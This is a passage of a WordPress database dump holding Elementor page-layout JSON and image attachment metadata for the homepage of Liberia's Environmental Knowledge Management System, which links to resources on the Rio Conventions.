Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(12424,2023,'_elementor_version','2.7.5'),(12425,2023,'_elementor_template_type','wp-page'),(12426,2023,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(12470,2035,'_wp_attached_file','2019/11/featured_epa.jpg'),(12471,2035,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:563;s:4:\"file\";s:24:\"2019/11/featured_epa.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"featured_epa-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"featured_epa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"featured_epa-768x422.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:422;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1548616719\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"16.1\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12472,2036,'_wp_attached_file','2019/11/featured_home1.jpg'),(12473,2036,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:531;s:4:\"file\";s:26:\"2019/11/featured_home1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"featured_home1-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"featured_home1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"featured_home1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573702754\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12474,2037,'_wp_attached_file','2019/11/featured_home2.jpg'),(12475,2037,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:533;s:4:\"file\";s:26:\"2019/11/featured_home2.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"featured_home2-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"featured_home2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"featured_home2-768x400.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573702754\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12476,2038,'_wp_attached_file','2019/11/featured_home3.jpg'),(12477,2038,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:539;s:4:\"file\";s:26:\"2019/11/featured_home3.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"featured_home3-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"featured_home3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"featured_home3-768x404.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573702754\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12478,2039,'_wp_attached_file','2019/11/featured_maps.jpg'),(12479,2039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:518;s:4:\"file\";s:25:\"2019/11/featured_maps.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"featured_maps-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"featured_maps-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"featured_maps-768x389.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1545498445\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12480,2040,'_wp_page_template','default'),(12481,2040,'_elementor_edit_mode','builder'),(12482,2040,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 